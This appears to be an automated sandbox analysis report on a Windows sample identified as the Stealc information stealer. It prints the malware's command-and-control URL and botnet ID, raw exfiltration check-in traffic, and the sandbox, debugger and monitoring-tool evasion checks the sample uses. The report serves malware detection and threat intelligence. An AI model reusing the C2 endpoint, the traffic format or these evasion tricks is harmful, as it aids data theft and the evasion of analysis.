Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532547
MD5:c611a14ca47ba7634683b36724d2b4c8
SHA1:537c413a3e9060f795510eb8d8659ad5b6de3080
SHA256:ba6b7db3b9727fd4132bd4e2e6065f0b28c0e21e0bcac29abb2a2d9e0a81425f
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5776 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C611A14CA47BA7634683B36724D2B4C8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1748761507.00000000055E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5776JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5776JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.c00000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-13T16:54:08.608740+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.c00000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/e2b1563c6670f193.php%Virustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/rsonationVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/kVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpiVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00C0C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C09AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00C09AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C07240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00C07240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C09B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00C09B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C18EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00C18EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C14910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C0DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C0E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C14570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C0ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C016D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C13EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C0F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C0BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C0DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 43 32 44 35 39 41 43 36 34 44 31 37 37 39 35 32 35 32 35 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 2d 2d 0d 0a Data Ascii: ------CGIEBAFHJJDBGCAKJJKFContent-Disposition: form-data; name="hwid"96C2D59AC64D1779525253------CGIEBAFHJJDBGCAKJJKFContent-Disposition: form-data; name="build"doma------CGIEBAFHJJDBGCAKJJKF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C06280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00C06280
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIEBAFHJJDBGCAKJJKFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 43 32 44 35 39 41 43 36 34 44 31 37 37 39 35 32 35 32 35 33 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 42 41 46 48 4a 4a 44 42 47 43 41 4b 4a 4a 4b 46 2d 2d 0d 0a Data Ascii: ------CGIEBAFHJJDBGCAKJJKFContent-Disposition: form-data; name="hwid"96C2D59AC64D1779525253------CGIEBAFHJJDBGCAKJJKFContent-Disposition: form-data; name="build"doma------CGIEBAFHJJDBGCAKJJKF--
                Source: file.exe, 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1803785871.00000000017E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1803785871.00000000017C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1803785871.00000000017E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1803785871.00000000017E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%
                Source: file.exe, 00000000.00000002.1803785871.00000000017C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpi
                Source: file.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/k
                Source: file.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/rsonation

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC90540_2_00FC9054
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCE1730_2_00FCE173
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F4916E0_2_00F4916E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD21530_2_00FD2153
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F861190_2_00F86119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCAAC10_2_00FCAAC1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC5AAE0_2_00FC5AAE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F79A740_2_00F79A74
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FD339D0_2_00FD339D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC9C370_2_00EC9C37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCFD640_2_00FCFD64
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC75070_2_00FC7507
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF9E8F0_2_00EF9E8F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FCC6720_2_00FCC672
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC4F6C0_2_00FC4F6C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7BF490_2_00E7BF49
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00C045C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: nezugdgl ZLIB complexity 0.9950165109536082
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1748761507.00000000055E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C18680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00C18680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C13720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00C13720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RCN7LLR0.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1844736 > 1048576
                Source: file.exeStatic PE information: Raw size of nezugdgl is bigger than: 0x100000 < 0x19c400

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.c00000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nezugdgl:EW;ksoeejvz:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nezugdgl:EW;ksoeejvz:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C19860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c91ed should be: 0x1ca00c
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: nezugdgl
                Source: file.exeStatic PE information: section name: ksoeejvz
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0100710F push 3BB60286h; mov dword ptr [esp], ebp0_2_0100713F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFB0EF push 4925F150h; mov dword ptr [esp], edx0_2_00FFB120
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FFB0EF push 278294A3h; mov dword ptr [esp], edx0_2_00FFB142
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0106792D push 48BD9D13h; mov dword ptr [esp], edi0_2_0106794D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01049141 push edx; mov dword ptr [esp], ebx0_2_01049169
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CA949 push ecx; mov dword ptr [esp], eax0_2_010CA9B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010CA949 push 6CA63701h; mov dword ptr [esp], ebx0_2_010CA9DC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0109E142 push edi; mov dword ptr [esp], edx0_2_0109E1B9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E660B9 push 577F9AB1h; mov dword ptr [esp], esp0_2_00E67218
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0103F976 push ebp; mov dword ptr [esp], eax0_2_0103F9AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0102919B push eax; mov dword ptr [esp], ebx0_2_010291AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 61797DBBh; mov dword ptr [esp], eax0_2_00FC9060
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push ebp; mov dword ptr [esp], edx0_2_00FC9064
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push ecx; mov dword ptr [esp], 19970B26h0_2_00FC9079
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push edi; mov dword ptr [esp], ebx0_2_00FC90AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push ebp; mov dword ptr [esp], edx0_2_00FC90D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push eax; mov dword ptr [esp], ecx0_2_00FC90E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 0FEF3131h; mov dword ptr [esp], ebx0_2_00FC9256
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 5DC6D4F6h; mov dword ptr [esp], edi0_2_00FC9301
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 71C5FB60h; mov dword ptr [esp], eax0_2_00FC933D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push edx; mov dword ptr [esp], esi0_2_00FC93C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push edi; mov dword ptr [esp], ebp0_2_00FC942B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 11C2F5FDh; mov dword ptr [esp], eax0_2_00FC943E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push ebx; mov dword ptr [esp], edi0_2_00FC9453
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push edx; mov dword ptr [esp], eax0_2_00FC9489
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 368B1250h; mov dword ptr [esp], ebp0_2_00FC9491
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 5E96FB7Ah; mov dword ptr [esp], ebx0_2_00FC9567
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 06EDCE5Bh; mov dword ptr [esp], edi0_2_00FC961F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 5A732B07h; mov dword ptr [esp], ecx0_2_00FC965D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push 3C6B24A1h; mov dword ptr [esp], ebx0_2_00FC967E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FC9054 push edi; mov dword ptr [esp], ebx0_2_00FC96C2
                Source: file.exeStatic PE information: section name: nezugdgl entropy: 7.953976955456083

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C19860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13548
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8055 second address: FD8065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8065 second address: FD806C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD806C second address: FD8078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8408CC9F86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8078 second address: FD8085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F84086DC792h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8338 second address: FD833E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD833E second address: FD835D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F84086DC796h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD84F1 second address: FD84F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
